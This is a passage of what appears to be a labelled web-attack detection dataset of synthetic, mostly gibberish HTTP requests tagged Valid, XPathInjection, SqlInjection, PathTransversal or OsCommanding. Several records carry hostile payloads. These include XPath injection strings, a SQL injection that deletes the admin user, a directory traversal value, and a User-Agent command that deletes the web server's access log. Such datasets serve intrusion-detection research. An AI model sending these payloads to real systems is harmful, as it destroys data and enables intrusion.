neu=t86jzSuYYW@&elhhoioteu9v3=mLtrbdfnenetcse&rgir8a0y=634333&8zF7b85Y=5dynSadbMv-&cgbhwuab3eTacst= epbX&samyRlaliwdbeg&yogssuBksy9s=1essbetweenamail&onwslrtlm=9Ie4iqAdsm

End - Id: 7363
Start - Id: 31956
class: Valid
GET /rFfkX_f9cbozBy-/eMo/ztftNsnlo.shtml? HTTP/1.1
Host: 248.112.53.118
Connection: keep-alive
Accept: video/quicktime;q=0.1, image/*;q=0.1, text/html;q=0.7
Accept-Charset: *;q=0.1
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: no-transform
Client-ip: 139.0.152.176
Cookie: aanw=1updatendivs;ymhhyhsen=0ti;jas=bOctmbvht
Cookie2: $Version="097"
Date: Sat, 06 Dec 08 06:35:16 GMT
ETag: "VF_kMMgT6GLs9T1RT"
Expect: 100-continue
From: ncshud3i@Nnqsh5.com
If-Modified-Since: Thu, 02 Sep 04 21:05:13 UTC
If-Unmodified-Since: Sun, 06 Jun 04 11:36:31 UTC
If-Match: *
If-None-Match: *
If-Range: "tYNsCSmcLUnSf0F@"
Max-Forwards: 46
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NTLM ZHJyU3pzemVwdGViaWlyck5lZWJuMXNhMWlpRXJkdDN5ZW50T0JiZw==
Authorization: NTLM ZWExZGhvY3RlbWV1b29sd3BlY3phdm9vaXNPZHJibnllZW5hZWFlYmFz
Range: -771267
Referer: http://www.swchtca.org/eezlbam/8aSgfrme.php4
TE: trailers,chunked
Trailer: Expect
User-Agent: uugctR/5.5
UA-CPU: Sparc
UA-Disp: 3482,947,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 3303x4060
Via: 8.9 www.lsoa.shtml
Transfer-Encoding: t45En; lSArSrtt=hsdmm1t
Upgrade: aceem/7.4, Aoax5/9.8, cdea/3.1, bed2e/6.9, Uiipl/0.8
Warning: 148 www.psN0t.tiff "Ha8aevrPaReu2aaa" 
X-Forwarded-For: 21.6.131.96
X-Serial-Number: 9668437330474941
----: ------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31956
Start - Id: 49822
class: XPathInjection
GET /GgsdW81shutdownjbcLdG/rdEda/1EDN.zz7Z3Q8EzbAqLEr/4reeneetuartgeszud/dXXYm6d/emUjQGdSuT9uKaQgNz/hKsw7lOrv.cgi?so703ole3=hmrcueaa%27+++++or+1%3C+lnbM%2Fua%2Fob%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D923%5D+++or++%272sstni%27+%3D%27&t0riSiiag=metaaiounion5rmeoe&7sfgto=99126548&eeRTN0eDtPrl=o8Sq2M1t&Xub=fmrs2hu&eoiTwaahsswspS=a4c6LDAaji&aNiignun=eitinsert&mcrelelsh0sdndt=9&cat4dRfD7o=5114&8utneoei=3ntlocations&i8muo8a1ttnue=nxtermhi%3F+%5Cee%29%40Ncj%40script%40ie+ HTTP/1.0
Host: www.3ssnee.fr:80
Connection: close
Accept: application/x-tar, image/gif, audio/basic
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 113.253.116.24
Cookie: tieneslhdpf=ee9E6AUbeac;oasn=wesein;1eLetiea=3li
Cookie2: $Version="4"
Date: Mon, 28 Aug 06 19:52:31 UTC
ETag: "zy_qieYB8jV9UgdeU3V"
Expect: 100-continue
From: noamdhg@Dea3h8.biz
If-Modified-Since: Tue, 01 Feb 05 04:39:17 UTC
If-Unmodified-Since: Sat, 18 Dec 04 11:43:13 GMT
If-Match: "61Me-zYyR-KuTQyv_"
If-None-Match: "oVNA9rVlIhP3cgwZ"
If-Range: *
Max-Forwards: 81
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Basic ZVJhcnJsQTppc3Blbw==
Authorization: Digest nc=35E3aFbA
Range: 146069-77725,-1146
Referer: http://e7et.org/eerbo.tiff
TE: trailers
Trailer: Pragma
User-Agent: nEXbG-EAFh http://www.safi.st
UA-CPU: MIPS
UA-Disp: 662,518,16
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 172x6984
Via: HTTP/7.0 www.hoeodieh.js
Transfer-Encoding: compress
Upgrade: no5e/1.8, lcc/5.5, gqm/0.6, trke/8.4
Warning: 205 www.ttrce.htm "Tia5umnten" 
X-Forwarded-For: 102.140.21.48
X-Serial-Number: 684744620
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49822
Start - Id: 48814
class: XPathInjection
GET /voirG/TE/ii7otaheuc8t/88oetfhtRediox/mRf0@Q/u6W-xdaPc./mlcv8VeD2@Z3/tOwhKSp7dm.vOA2RG/pB5YIR@@CY.aspx?oe=openh1%24&xlnun6abbaphest=8&auuiNabsfD=rlrsock_streamt&ohnte=32837565&AilhcmaaG3eniee=58985&Oree6p5=iesXusrhussto&rplceUknnl4rryp=dSq_fZIRW&ergechsatrS=Os%27+or+++count%28+path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i+++%2B++j+%2B++k%2B++++l+%2B1%29%5D++++%7C+++path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++or+++%27cc%27%3D%27++++sikil4m%27+or HTTP/1.0
Host: www.hira1as.cz:80
Connection: close
Accept: video/*
Accept-Charset: utf-7;q=0.3, iso-8859-9;q=0.1, iso-10646-ucs-2;q=0.4, iso-8859-6;q=0.4
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 5.230.196.145
Cookie: jRrAjU=t4ewdderrrar;o4=dati3uxcrsoa
Cookie2: $Version="7"
Date: Wed, 18 Mar 09 13:49:31 CET
ETag: W/"6WLOop_Whk@w0uCW8DO"
Expect: 100-continue
From: 18kll@eaes.it
If-Modified-Since: Sun, 22 Nov 09 21:54:43 GMT
If-Unmodified-Since: Sat, 03 Jan 09 04:44:01 CET
If-Match: "e@nrx@bG2IYw9Bqyh"
If-None-Match: "5l-U6NbcP@-tHyO@2"
If-Range: Sun, 10 Jul 05 02:03:38 UTC
Max-Forwards: 61
MIME-Version: 7.6
Pragma: ofw=eRvn
Proxy-Authorization: Digest response="08bA7c67a569BFcBED9f6CeCC1e6B5Cb"
Authorization: NTLM c2t0ZG50SjdzTGx5c28wRWl1c3VubmxtbnRjZWVmbm50eUlmYW5pdGk=
Range: 5920-3
Referer: /np9ob/la0nqidv.js
TE: trailers,chunked;q=0.1
Trailer: If-Match
User-Agent: iidaocr1e (wQVVNqAN0K; i@jLdE1s; e8Bxt9; lOXIuEu)
UA-CPU: MIPS
UA-Disp: 065,1900,8
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 610x7320
Via: FTP/9.5 84.230.141.51
Transfer-Encoding: compress
Upgrade: DgPrai/4.4
Warning: 424 www.laos.html:03306 "NcpIttput1seRq0unb" 
X-Forwarded-For: 30.210.172.155
X-Serial-Number: 5379207643
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~

null

End - Id: 48814
Start - Id: 35083
class: SqlInjection
GET /e_/Uf/homeu_3Un/EeoycbeotRuiNlneerdg/r2ee6de.mdb? HTTP/1.1
Host: 138.103.203.226:80
Connection: in8AcO
Accept: */*;q=0.4
Accept-Encoding: aeprhrr2i'    );  DELETE   FROM  users     WHERE   upper(username)     =    upper(   'admin
Accept-Language: aTR-d, 9esBwo-f, uin-hei, eqahb-Tos
Cache-Control: min-fresh=7
Date: Fri, 07 Mar 08 22:41:10 CET
From: i7xsde@alroNmEdii.cz
If-Range: Fri, 30 Jan 09 15:26:35 UTC
Max-Forwards: 80
Referer: /0die/aomLz/slxi.jsp
User-Agent: 69eE/0.8.1
Via: 0.2 93.44.244.10, 6.5 www.ste9L.css, 3.6 65.142.5.86
Warning: 805 46.58.201.130 "PnCEsji50oldihgh0oun" 
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35083
Start - Id: 25177
class: Valid
GET /wpwhMTs-zkDz4epcsAc7/x4lTCK-jnopQ8FA/tcos9Ianfeubie8oorn4/21n/pi.php4? HTTP/1.0
Host: 96.226.222.176
Connection: EggxcU1
Accept: video/*;q=0.6, audio/*, application/zip
Accept-Charset: windows-1254, iso-8859-4, euc-cn;q=0.4, iso-8859-8-i;q=0.5, iso-8859-8
Accept-Encoding: gzip, gzip;q=0.2, deflate;q=0.8
Accept-Language: oA-h
Cache-Control: no-transform
Client-ip: 56.216.77.220
Cookie: sndt=2;ietajseosg=31;ardN2qlLbr=69221716;Rxs57HocPR=oe
Cookie2: $Version="787"
Date: Sat, 06 May 06 20:20:02 CET
ETag: W/"hAqlYd2Sq6tOVY8lO"
Expect: 100-continue
From: el7lecc@sineh6ta6t.ch
If-Modified-Since: Fri, 13 Jun 08 05:44:35 UTC
If-Unmodified-Since: Thu, 10 Dec 09 19:16:38 CET
If-Match: "D5ULEZCR17_-ynMRdSNI"
If-None-Match: *
If-Range: *
Max-Forwards: 7840
MIME-Version: 9.1
Pragma: no-cache
Proxy-Authorization: NTLM eHVjMWU5b2lodGVzdG9Jd1R6Zm9kbW5paGgyck9hRTc=
Authorization: Ttxai nEcrn=en0nN
Range: 82-7262,2-,43018-
Referer: http://neaiDUi.fr/olh6/htHhSrG/1elui.cgi
TE: trailers
Trailer: Via
User-Agent: Mozilla/5.6 (Windows; U; Win 9x 6.9; kE-hq; rv:5.0.2) Gecko/01916670
UA-CPU: Sparc
UA-Disp: 550,936,8
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 5457x802
Via: FTP/3.4 117.224.122.11, steoo/7.4 www.enbi.jpeg:7833
Transfer-Encoding: identity
Upgrade: tIis/4.6
Warning: 916 29.90.96.90:39 "ntz1w0fhvsoy" 
X-Forwarded-For: 23.5.186.247
X-Serial-Number: 39906730696975900354
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25177
Start - Id: 45007
class: PathTransversal
GET /ovl/twdCjX/hRjqO0SdEXtnk/oorNMi44laaiio/ieou5xadaS/ticuaSqbihl/saLeK/@h6Dphtpassu-Jiframesock_stream/eiu8h7VuLxdsHb/sdsxubre/ovdh4ZO-3BEPQmSmY2WV/tjqteawehaaE.css?hn=o-o0PwnfI&i8slMtrhneo=.%2F..%2F..%2F..%2F..%2F..%2F&tcjhssedsm=7&apnbiRhtEhtt1=eetorpT+0+%2Be&oFqAb6evalAct=tUzm&4nrbrewimhhsA=anensrr%40r4e%7Czmle&lwOymerrotsw8e6=80581&edcdsny1ofox=131&ifnue048DoEbe7=wgovh3tpa1ftoCuduO&pEcmd2TRDtH=02%40 HTTP/1.1
Host: 47.136.215.204
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: x-mac-turkish;q=0.2
Accept-Encoding: deflate;q=0.1, compress, gzip, deflate, compress
Accept-Language: seimem-r9E9in;q=0.7, n-aul;q=0.2, irlovp-tTuedr8e, fenEmren-ekooanr;q=0.7, ut-rtit
Cache-Control: only-if-cached
Client-ip: 112.221.77.108
Cookie: 6b6S48GO=bGQ
Cookie2: $Version="413"
Date: Thu, 23 Nov 06 15:12:37 CET
ETag: "06Aqq7j6Gd0C_dK"
Expect: 100-continue
From: Wmt1aod@ntoq7.ch
If-Modified-Since: Sun, 11 Oct 09 11:25:31 CET
If-Unmodified-Since: Tue, 13 Jul 04 20:29:08 CET
If-Match: *
If-None-Match: "oRfbweH_7ShF7_Dy@R-X"
If-Range: "ppcBlPEPkq2AB@2Jx"
Max-Forwards: 826
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic b3RkdDJlYTc6bWlhVG41RUE=
Authorization: NTLM aXNyYWVzaHlnbnRlaWF0UTlnbGN0bXBjaWFxdHR0aTNhdDJ2cmVhc3M=
Range: 2613-116,8-,0-
Referer: http://www.iosSti.ch/mi4rib/ifto/ccitdeii/lHbltd/1tesef3.tiff
TE: chunked,gzip,gzip;q=0.3
Trailer: If-Modified-Since
User-Agent: teEeeh
UA-CPU: StrongARM
UA-Disp: 702,0024,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 569x3212
Via: FTP/9.1 www.naoe.tiff, 7.6 www.el2urst.gif, HTTP/1.9 www.e9PircEi.tiff:64
Transfer-Encoding: compress
Upgrade: Eubq/3.7
Warning: 841 177.253.103.43 "siish1237R9c5ebtn" "Mon, 07 Dec 09 02:26:19 UTC"
X-Forwarded-For: 2.2.77.25
X-Serial-Number: 416965693629057217
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 45007
Start - Id: 43623
class: OsCommanding
PUT /c55dixt1sfluinpiebuo/2dwXA4a/tMO.3JuK/cnwf/6ecuWN9KovAXIDAEwW/XE6_4kP/oSXbwr/ecnct6tiadho.gif? HTTP/1.0
Content-Length: 146
Content-Language: esri3
Content-Encoding: identity
Content-Location: http://www.r2aeo.com/idi6MQe/haam/8nnrbcL/l0o8ym0/acsrtci.doc
Content-MD5: bExsbXNnYWFuZW5zbmxvYg==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 10 Dec 07 15:59:34 UTC
Host: 37.0.104.170:77
Connection: keep-alive
Accept: */*;q=0.1
Accept-Charset: windows-874, iso-8859-8;q=0.6
Accept-Encoding: deflate;q=0.8, gzip;q=0.0
Accept-Language: cDym-dia2
Cache-Control: no-cache
Client-ip: 224.134.148.160
Cookie2: $Version="2"
Date: Fri, 02 Apr 10 10:19:31 CET
Expect: 100-continue
If-Modified-Since: Sun, 02 Aug 09 08:57:55 GMT
If-Unmodified-Since: Mon, 05 Feb 07 20:32:00 UTC
If-Range: "bKkhbknrAVFO08k1"
Max-Forwards: 060
Pragma: no-cache
Range: 887295-
Referer: /ilTucon/inds/gttoh/eteIe.png
TE: deflate
Trailer: From
User-Agent: %0arm  -f  /var/log/httpd/access_log  ;
Warning: 252 70.73.147.186 "pEmiltogwecsNt4" "Tue, 06 Jan 04 03:06:17 CET"

ratEtrcTlahrne=8002632&cfexaopqdigtnnn=lbkiprgDlform&tostyzsOn=nEiLzg8P&eeduotvhh=l3NFFTSI&eOiswsH0aeaZ=315&Wynph-I_3D=nj&p8ihtvNrnihe=eg-ZpwZzFCP

End - Id: 43623
Start - Id: 19804
class: Valid
GET /t5n3fEatoaT9sericnza/yTGQKg/x_HP5ueO6/EruP9rcoiodRmern/gKw8yX6sJl/fryahsR5onumry/t4aircniadgItn8cr1e/hvxi/ls05blkTDhgR/i9Fn7Egw7_2a/wrhttps/teeoeumop6.aspx?pVPusr=xMbugf&bbfni0h5havtaet=726&wbdn=roahn HTTP/1.1
Host: www.nbooetieN.cz
Connection: close
Accept: video/*;q=0.1, application/x-tar;q=0.8
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, compress;q=0.5, compress;q=0.9, gzip;q=0.4
Accept-Language: ee6ol-s;q=0.5, d-tdaei
Cache-Control: h=zri
Client-ip: 140.175.207.228
Cookie: otrA2=104828
Cookie2: $Version="8"
Date: Tue, 14 Dec 04 14:40:54 CET
ETag: "TS2JMorKZGafPwYxG4ru"
Expect: eupddlzx
From: ilotit@a0vnis.fr
If-Modified-Since: Wed, 07 Nov 07 18:01:14 CET
If-Unmodified-Since: Fri, 28 Aug 09 05:34:51 CET
If-Match: *
If-None-Match: *
If-Range: Wed, 31 Aug 05 12:35:24 GMT
Max-Forwards: 506
MIME-Version: 9.5
Pragma: no-cache
Proxy-Authorization: Basic c3Q3dGx0OmFpaHBzc3k=
Authorization: 6zh7oq Tltw=oeFnr
Range: 451438-434
Referer: http://3sogubh.net/aheE4de/luho.txt
TE: trailers
Trailer: If-Modified-Since
User-Agent: pned (sDVHCEbX)
UA-CPU: 68000
UA-Disp: 881,593,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 9755x916
Via: FTP/9.8 149.82.161.197
Transfer-Encoding: Ureie; nn25sseR=gfs3blg
Upgrade: txnfn/7.8, apjrb/0.3
Warning: 962 110.175.21.28 "nPnxec" "Mon, 29 Aug 05 22:03:18 UTC"
X-Forwarded-For: 151.180.14.8
X-Serial-Number: 09282554265324
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19804
Start - Id: 25048
class: Valid
GET /e.Qw.yRGt-Kw@wVfzMf/Ini7tSnrerdc/pWF.exe?BXsystemLkinput@4=71817334&XWnPTporDS=npIsfie%40%40atx&ocyzq=1173 HTTP/1.1
Host: www.fqskerreMe.uk:80
Connection: close
Accept: audio/*;q=0.4
Accept-Charset: x-mac-turkish;q=0.0, utf-7;q=0.4, x-mac-roman, iso-8859-7;q=0.3, x-mac-greek;q=0.6
Accept-Encoding: *;q=0.2
Accept-Language: gvmfeM-nneoaey, e-iuaatnn, n-epn
Cache-Control: max-age=46
Client-ip: 68.200.80.51
Cookie: frizoceamZh0e=agxj0CSa;.599JK9UzP=eVq1W;EoE=822;cmd1hVG1F@IlP-=eDTitlmfsutEtlog;Tacceptinetcat=uay3byedeketaeo
Cookie2: $Version="3"
Date: Mon, 31 Jan 05 13:28:00 UTC
ETag: W/"4Za38LYvU1h@026ySz"
Expect: 100-continue
From: Nett@Mbgoe.fr
If-Modified-Since: Sun, 14 Jan 07 16:45:53 UTC
If-Unmodified-Since: Thu, 25 May 06 14:07:37 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 10
MIME-Version: 0.1
Pragma: no-cache
Proxy-Authorization: Digest qop=auth-int
Authorization: Digest qop=auth
Range: 978-9166
Referer: http://6ie4.be/uaijhze/aci7n/dsesot.asp
TE: deflate;q=0.0
Trailer: If-Unmodified-Since
User-Agent: nth2rPrfs (j5cL5vc; tmEF9h; raUZRy; rxrexl; uO_NzE__-7)
UA-CPU: x86
UA-Disp: 002,8745,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 6866x078
Via: 0.2 168.208.38.243, 6.3 144.58.200.227
Transfer-Encoding: eslon
Upgrade: TpPo/7.9, mmA/5.5, srAneh/5.3, eag/1.0
Warning: 154 www.tw6sot.shtml "4eodetrlyah" "Tue, 21 Mar 06 01:21:00 CET"
X-Forwarded-For: 6.112.100.122
X-Serial-Number: 21941
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25048
Start - Id: 34836
class: Valid
POST /_Y@1bOprocessing-instructionJsCeU.aspx? HTTP/1.0
Content-Length: 231
Content-Language: 3e
Content-Encoding: identity
Content-Location: /HXpymtLn/6aoEehr/i3siweas/Zrow.pdf
Content-MD5: ZW9pbmIxVG5odzNwb2FoaA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 12 Mar 08 03:59:23 UTC
Last-Modified: Sat, 10 Sep 05 06:30:13 CET
Host: 113.76.5.26
Connection: mstot
Accept: audio/basic;q=0.9, text/plain, audio/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: yvncH9-cmqs, ravea7in-6rs;q=0.3, sp-Tduwsnl
Cache-Control: egaz='sjii'
Client-ip: 16.40.155.255
Cookie: dauayrrieedtoaa=awpv7Raq;eeentene6v=snl1waarl c1
Cookie2: $Version="92"
Date: Wed, 13 Oct 04 09:10:26 CET
ETag: W/"bqeMAefW9cPM72PS"
Expect: 100-continue
From: i8g2jct@4te48.fr
If-Modified-Since: Sun, 31 May 09 07:40:42 CET
If-Unmodified-Since: Tue, 12 Sep 06 09:02:51 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 22 Oct 05 24:07:16 GMT
Max-Forwards: 876
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest response="56FFddd048DB85AF437AF9E1cF7F3afc"
Authorization: Basic ZTYyZDl0OmF0aWw5b0dT
Range: 623768-8270,-361888,-69728
Referer: /Uieje.jsp
TE: trailers,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: eterlhDbs/1.3.6
UA-CPU: x86
UA-Disp: 308,802,8
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 3246x5463
Via: HTTP/2.8 www.beletpbd.png:41, HTTP/5.3 www.Ybss.tiff, 4.7 www.k2n7.jpg
Transfer-Encoding: deflate
Upgrade: xAqmi/0.2, o1hgea/4.1, rIdu/2.7, hori/6.4, 4dToph/6.1
Warning: 029 www.ldelcm.jpg "mt7u16ipeiusedskeu1" 
X-Forwarded-For: 77.62.199.33
X-Serial-Number: 11691729475
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oo=5583153&vULou=R]eisx6/hst%ns&cedclmPis=aservices6&akfq=eDhesye@&tC9T9unionA=7&ed1ah=neUl)vLehhiti&ayepao3=95004&0execvhO=turt&tcEmi=n&e7d5=y7t95&RmY3php3==ao&rdbei7ddteme=t&XshomewZUZePJDt=3plnele&ntcT=4635395&4QO0=3

End - Id: 34836
Start - Id: 48634
class: XPathInjection
PUT /KpsnQSs-system/cReiwnksd/exuue/a_vnLbikxc/yrngftr/oF@dUYSCj/lp7l1dyy7hrciyd8anws.jpg? HTTP/1.0
Content-Length: 265
Content-Language: tn30tg
Content-Encoding: gzip
Content-Location: /eeeaa/rUfktNi/Tezvoew/njntt.tar
Content-MD5: amlreWhkbW9pYW8wb0E4TA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Mar 09 07:58:57 GMT
Last-Modified: Wed, 25 Apr 07 23:27:32 GMT
Host: 189.67.142.149:4749
Connection: close
Accept: image/gif, application/*;q=0.6
Accept-Charset: x-mac-icelandic, x-mac-arabic, iso-10646-ucs-2, iso-8859-1;q=0.7, euc-jp
Accept-Encoding: 
Accept-Language: ehRsmta-d;q=0.9, t9-oeiEtnt, iehahd-ssUfEzaL, S-ftiaefnR;q=0.4, ai4wnxiS-e;q=0.4
Cache-Control: no-transform
Client-ip: 212.18.180.154
Cookie: Eb0Y=ratDrosi;o5=553;o3ze5eAtHiue=1aamocha7<ea1iej;96XsbwQ=lsiig;tOasn=ht;aThatu=ti
Cookie2: $Version="9"
Date: Sat, 21 Jul 07 11:56:48 UTC
ETag: W/"EZ85ec1UkDY_9WvB"
Expect: nIa1=ttl7lssu;IeiaDaia
From: Ninoyjig@whephoIrat.uk
If-Modified-Since: Fri, 04 Apr 08 22:48:25 UTC
If-Unmodified-Since: Sat, 17 Nov 07 20:19:52 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 08 Dec 05 02:29:33 CET
Max-Forwards: 9
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Digest response="39AABfB2d62AF480C2dD2Fe8b3CE4C25"
Authorization: eyris 6av6=zara
Range: -046912,8351-4,007308-22
Referer: /yabauoeE/hmrrm7e.cfm
TE: gzip;q=0.7,trailers,trailers
Trailer: Range
User-Agent: Mozilla/3.9 (Windows; U; Win98 6.9; 78-s1; rv:2.1.1) Gecko/03725407
UA-CPU: Sparc
UA-Disp: 445,3522,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 090x151
Via: HTTP/3.1 66.162.17.172
Transfer-Encoding: gzip
Upgrade: eode/7.7
Warning: 007 www.Trxsrhsu.jpeg "1T0dhor5" 
X-Forwarded-For: 134.235.97.118
X-Serial-Number: 498858561497
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

sndrno4dteDcns=smhe'   or   count(    path/child::node()[position(   )=((i +j   +   k+ l  +1)]  |    path/child::*()[position()=(k+1)])=1  or    'matrd'    = '    rieq'   or&te=qtea&a

End - Id: 48634
Start - Id: 7966
class: Valid
PUT /iV75aD4Sz2JhE/aVG4XpjqmR0U/iMnD3BoVqe1vI@BB.css? HTTP/1.0
Content-Length: 146
Content-Language: nso,e,tr9be
Content-Encoding: gzip
Content-Location: http://www.eogImT.fr/atswn6/jrtts/ctfttc5d/tfo7rEne/gbcaneh.js
Content-MD5: dG5Sd2VhaG5oc1RCTHBldA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 04 Feb 07 14:01:10 UTC
Last-Modified: Thu, 08 Feb 07 02:00:38 GMT
Host: www.whv6ia.st
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: cp-932, iso-10646-ucs-2;q=0.0, isiri-3342;q=0.6
Accept-Encoding: gzip;q=0.7, deflate;q=0.3, deflate;q=0.4, deflate;q=0.3
Accept-Language: *;q=0.9
Cache-Control: max-age=080
Client-ip: 244.62.195.136
Cookie: rqrF5uGK1=m8ccS23o;openDh14gZ05EZ=rs0;ata2kn=2;bmerbctonnatth=5 t dkh?0vvE p
Cookie2: $Version="017"
Date: Fri, 19 Mar 10 12:34:07 UTC
ETag: "hUVTbjlm-XPZxKg"
Expect: 100-continue
From: eedf0au@eYilizod8t.de
If-Modified-Since: Sun, 05 Aug 07 12:01:16 UTC
If-Unmodified-Since: Tue, 06 Mar 07 08:26:41 GMT
If-Match: *
If-None-Match: "Q-0mHB5YsdXux6g1kisE"
If-Range: Sat, 12 Apr 08 09:16:05 GMT
Max-Forwards: 6
MIME-Version: 1.2
Pragma: hgeaei=w
Proxy-Authorization: Digest response="a2C814F4b16fc2F09cDaA0d046FBdB04"
Authorization: Digest uri=http://www.scnaa.gov/eTdEwsi.mdb
Range: -607
Referer: /rNocemia/4EnbR/rltera9/tllx/epyn.cfm
TE: trailers,deflate
Trailer: If-Match
User-Agent: Mozilla/5.5 (Windows; U; Windows NT 7.2; Rh-lt; rv:4.0.2) Gecko/81939334
UA-CPU: MIPS
UA-Disp: 4676,8640,32
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 094x6003
Via: 0.0 www.ieeur.tiff
Transfer-Encoding: compress
Upgrade: rRndxQ/4.8, m7j2ro/0.4, xec/7.9, aPodde/0.0, lld/6.5
Warning: 583 50.58.211.108 "lh5crmtllesSieanni" "Mon, 08 Jan 07 08:44:59 UTC"
X-Forwarded-For: 8.49.98.213
X-Serial-Number: 56493
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~

Gginsert2Rs6f=stul&cn=760&TreS=22924961&zl0nMhg6xhsIr=rkqfNQ&orafs_lXW=yo_XNHm&IoawandvNNx=120&lGfromN8=8592&ea4lms=y)nRhhte3oF&ueshdataaeiAtt=8

End - Id: 7966
Start - Id: 15738
class: Valid
GET /ifi1/e9prJlTkRwHn8Ke/1w.hIi1iJFW-/tsnw6Neaaoo0ru.gif? HTTP/1.0
Host: 150.187.2.199
Connection: keep-alive
Accept: */*;q=0.5
Accept-Charset: iso-2022-jp, x-mac-chinesetrad
Accept-Encoding: *;q=0.9
Accept-Language: *;q=0.0
Cache-Control: max-age=463
Client-ip: 136.117.237.163
Cookie: emlopee=ejdFp7X4Z;henry=quIt;oenp=35150;0ftpgRJ6J=101291;teqan=3472961;2cetlpApu=wOgX
Cookie2: $Version="33"
Date: Fri, 02 Jul 04 09:53:56 UTC
ETag: "drF@UkiWQqdN-@o@@maE"
Expect: 100-continue
From: uvmHrh6n@nNnouty.biz
If-Modified-Since: Thu, 26 Apr 07 24:34:39 UTC
If-Unmodified-Since: Tue, 04 Apr 06 03:17:47 GMT
If-Match: *
If-None-Match: "v7SQoJkhrK.qoJ-VTPj"
If-Range: Fri, 26 May 06 08:35:46 UTC
Max-Forwards: 01
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: lihojw cfazeyii=eaiemae
Authorization: oJdm hwsurlyh=ntneerhh
Range: 8313-,-95
Referer: /eul9f/rmifT2/3dTvr.msf
TE: gzip
Trailer: If-Unmodified-Since
User-Agent: Mozilla/8.5 (Windows; U; Win 9x 6.5; er-In; rv:9.4.7) Gecko/05618721
UA-CPU: StrongARM
UA-Disp: 0822,807,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 516x1974
Via: 9.7 www.uloniwer.png, FTP/1.3 147.202.170.119, HTTP/3.2 62.199.218.204
Transfer-Encoding: compress
Upgrade: sa1t/1.5, eceLnn/9.5
Warning: 292 89.170.49.168 "uedsnr" "Fri, 14 Jan 05 23:32:27 CET"
X-Forwarded-For: 76.30.185.202
X-Serial-Number: 555023929683
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 15738
Start - Id: 4335
class: Valid
POST /ezj/QVinput6uOdocumentUn2JWIC1/eniqakIRaU-Yw/hne0.sh? HTTP/1.1
Content-Length: 113
Content-Language: utEe7ten,5ncelsU,onttnr
Content-Encoding: compress
Content-Location: /4s6ipcwt/Eneian/Enthas/h5al.gz
Content-MD5: YjhhdWd3NXVlaXRjbk1pVA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 03 Apr 09 05:59:42 GMT
Last-Modified: Sat, 16 Oct 04 17:14:16 CET
Host: www.thlmt.ch
Connection: irbebeee
Accept: */*;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.7
Cache-Control: only-if-cached
Client-ip: 67.250.58.132
Cookie: Zw3iconnectPPuItf9=141;4obhne=5378
Cookie2: $Version="10"
Date: Sun, 02 May 04 06:56:06 UTC
ETag: W/"GXGK-.REYw4zTvKw"
Expect: 100-continue
From: 5soaa@eElhadti.fr
If-Modified-Since: Sat, 27 Nov 04 07:17:53 UTC
If-Unmodified-Since: Wed, 15 Mar 06 08:56:56 CET
If-Match: "NNyXPQZ3kk7Ktm4j3"
If-None-Match: *
If-Range: Tue, 15 Nov 05 22:03:43 UTC
Max-Forwards: 22
MIME-Version: 1.0
Pragma: lXkn9='5leofgie'
Proxy-Authorization: Digest nonce
Authorization: NTLM Q1RvcDZzYW9ucWJkZWduaGVheXRjZldldHN1Z2VmYXRvaWVlaQ==
